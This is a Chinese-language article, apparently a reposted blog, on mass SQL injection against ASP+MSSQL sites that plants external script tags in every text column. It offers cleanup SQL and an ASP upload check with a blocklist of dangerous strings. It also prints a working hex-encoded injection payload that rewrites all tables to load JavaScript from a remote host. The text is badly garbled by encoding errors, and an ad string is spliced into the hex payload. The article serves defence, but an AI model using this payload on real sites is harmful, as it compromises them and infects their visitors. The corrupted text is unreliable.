mssql的每個(gè)varchar、text字段都被自動(dòng)插入一段js代碼�����,即使刪除這段代碼����,如果沒有從源頭上解決,幾分鐘后�����,js代碼就又會(huì)自動(dòng)插入數(shù)據(jù)庫(kù)�。
經(jīng)過飄易的觀察,這很有可能是程序自動(dòng)執(zhí)行的��,黑客先從搜索引擎google、百度等搜索存在漏洞的采用asp+mssql設(shè)計(jì)的網(wǎng)站�����,然后采用小明子這樣的注入掃描工具���,掃描整個(gè)網(wǎng)站����,一旦發(fā)現(xiàn)有sql注入的漏洞或者上傳漏洞����,黑客就通過各種手段,上傳自己的大馬����,如海陽(yáng)木馬;然后�����,黑客就把這個(gè)網(wǎng)站納入他的肉雞列表�����,隨時(shí)在數(shù)據(jù)庫(kù)里加入自己希望加的js代碼,而這些代碼往往是包含著眾多的的病毒���、木馬�����,最終讓訪問受控網(wǎng)站的用戶的電腦中毒�����。
雖然,可以通過sql查詢分析器執(zhí)行批量代換�����,暫時(shí)解決被插入的js代碼問題�����,然而不從根本上解決整個(gè)網(wǎng)站存在的漏洞��,包括程序上和服務(wù)器安全權(quán)限��,那么黑客還是隨時(shí)可以入侵你的網(wǎng)站數(shù)據(jù)庫(kù)����。
在sql查詢分析器里可以執(zhí)行以下的代碼批量替換js代碼:
復(fù)制代碼 代碼如下:
“ update 表名 set 字段名=replace(字段名,'Script Src=http://c.n%75clear3.com/css/c.js>/Script>','') ”
flymorn仔細(xì)檢查了網(wǎng)站��,發(fā)現(xiàn)網(wǎng)站存在幾個(gè)安全問題:
第一�����,網(wǎng)站存在上傳漏洞�����;雖然�,上傳文件需要管理員身份驗(yàn)證���,也對(duì)上傳文件進(jìn)行了文件格式的認(rèn)證�����,但管理員身份驗(yàn)證采用了cookies�����,而cookies是可以被偽造的�����,而且如果上傳了圖片后��,不對(duì)該文件的內(nèi)容采取任何判斷的話�����,那么圖片木馬也很有可能被上傳���。
解決措施:1 刪除上傳文件功能(不太實(shí)際)���;2 修改上傳用戶驗(yàn)證為session驗(yàn)證;3 對(duì)上傳后的文件內(nèi)容進(jìn)行驗(yàn)證���,如果是圖片木馬,則刪除���;可以參考以下的驗(yàn)證代碼:
復(fù)制代碼 代碼如下:
''===============判斷上傳文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
if instr(sTextAll,sNoString(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filePath)
set filedel = nothing
Response.Write("script>alert('您上傳的文件有問題���,上傳失敗���!');history.back();/script>")
Response.End
end if
next
''=================判斷上傳文件是否含非法字符串end===================
第二���,網(wǎng)站存在cookies注入漏洞�����。由于程序設(shè)計(jì)中���,為了考慮到減小服務(wù)器的開銷,所有用戶登陸后采用cookies驗(yàn)證�����,這個(gè)cookies里保存了用戶的 ID 和 NAME �,而眾所周知,cookies是經(jīng)常被黑客偽造的����,這是其一;另外��,某些外部參數(shù) 沒有采用嚴(yán)格的 request.form 和 request.querystring 來獲取內(nèi)容�,為了簡(jiǎn)便,采用了 request("id") 這樣的方式��。
我們知道,ASP 的request 是先從form��、querystring里獲取內(nèi)容��,如果這兩個(gè)為空�,則要從cookies里獲取內(nèi)容,大家往往在程序設(shè)計(jì)中考慮到了 request.form 和 request.querystring 的SQL注入�����,所以一般都會(huì)過濾 request.form 和 request.querystring進(jìn)行sql注入��;但卻偏偏忘了過濾cookies方式下的注入����。我們來看下下面這樣的sql語(yǔ)句:
復(fù)制代碼 代碼如下:
SQL="select * from 表名 where id="request("id")
如果這個(gè) id 恰巧是通過cookies來獲取值的,那么想想�����,這是一件多么可怕的事?���?!注入者可以輕松的偽造一個(gè)名為 id 的虛假 cookies ,因?yàn)檫@個(gè) id 的cookies 是服務(wù)器分配給它的。這個(gè)cookies可以被偽造成類似下面這樣的一段代碼:
復(fù)制代碼 代碼如下:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網(wǎng)(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--
12下一頁(yè)閱讀全文
您可能感興趣的文章:- php中防止SQL注入的最佳解決方法
- PHP開發(fā)中常見的安全問題詳解和解決方法(如Sql注入��、CSRF�����、Xss���、CC等)
- T-SQL篇如何防止SQL注入的解決方法
- MySQL Proxy(解決注入的另一思路)
- MySQL解決SQL注入的另類方法詳解
- SQL注入原理與解決方法代碼示例
- 通過ibatis解決sql注入問題
- sqlserver 數(shù)據(jù)庫(kù)被注入解決方案
- SQL注入漏洞過程實(shí)例及解決方案
- 實(shí)例介紹SQL注入以及如何解決
